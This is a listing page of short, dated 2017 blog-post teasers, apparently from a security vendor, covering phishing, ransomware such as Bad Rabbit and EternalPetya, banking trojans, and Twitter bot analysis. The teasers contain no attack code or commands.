Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it. The shortened link was initially redirecting to Youtube.com, but was later on changed […]

2017-10-30

The big difference with Bad Rabbit

Bad Rabbit is the new bunny on the ransomware scene. While the security community has concentrated mainly on the similarities between Bad Rabbit and EternalPetya, there’s one notable difference which has not yet gotten too much attention. The difference is that Bad Rabbit’s disk encryption works. EternalPetya re-used the custom disk encryption method from the […]

2017-10-27

Following The Bad Rabbit

On October 24th, media outlets reported on an outbreak of ransomware affecting various organizations in Eastern Europe, mainly in Russia and Ukraine. Identified as “Bad Rabbit”, initial reports about the ransomware drew comparisons with the WannaCry and NotPetya (EternalPetya) attacks from earlier this year. Though F-Secure hasn’t yet received any reports of infections from our […]

2017-10-26

Twitter Forensics From The 2017 German Election

Over the past month, I’ve pointed Twitter analytics scripts at a set of search terms relevant to the German elections in order to study trends and look for interference. Germans aren’t all that into Twitter. During European waking hours Tweets in German make up less than 0.5% of all Tweets published. Over the last month, […]

2017-09-25

TrickBot In The Nordics, Episode II

The banking trojan TrickBot is not retired yet. Not in the least. In a seemingly never ending series of spam campaigns – not via the Necurs botnet this time – we’ve spotted mails written in Norwegian that appear to be sent by DNB, Norway’s largest bank. The mail wants the recipient to believe that they […]

2017-09-14

Working Around Twitter API Restrictions To Identify Bots

Twitter is by far the easiest social media platform to work with programmatically. The Twitter API provides developers with a clean and simple interface to query Twitter’s objects (Tweets, users, timelines, etc.) and bindings to this API exist for many languages. As an example, I’ve been using Tweepy to write Python scripts that work with Twitter data. […]

2017-08-31

Trump Hating South Americans Hacked HBO

Last week – I read the message “Mr. Smith” reportedly sent to HBO… and it brought up a few questions. And also, it offered some “answers” to questions that I’m often asked. Questions such as “how much money do cyber criminals make?” Here’s the start of the message. First, let’s examine Mr. Smith and his […]

2017-08-24

Break your own product, and break it hard

Hello readers, I am Andrea Barisani, founder of Inverse Path, which is now part of F-Secure. I lead the Hardware Security consulting team within F-Secure’s Cyber Security Services. You may have heard of our USB armory product, an innovative compact computer for security applications that is 100% open hardware, open source and Made in Italy. […]

2017-07-19

Retefe Banking Trojan Targets Both Windows And Mac Users

Based on our telemetry, customers (mainly in the region of Switzerland and Germany) are being targeted by a Retefe banking trojan campaign which uses both Windows and macOS-based attachments. Its massive spam run started earlier this week and peaked yesterday afternoon (Helsinki time). TrendMicro did a nice writeup on this threat earlier this week. The […]

2017-07-14

How EternalPetya Encrypts Files In User Mode

On Thursday of last week (June 29th 2017), just after writing about EternalPetya, we discovered that the user-mode file encryption-decryption mechanism would be functional, provided a victim could obtain the correct key from the malware’s author. Here’s a description of how that mechanism works. EternalPetya malware uses the standard Win32 crypto API to encrypt data. […]

2017-07-04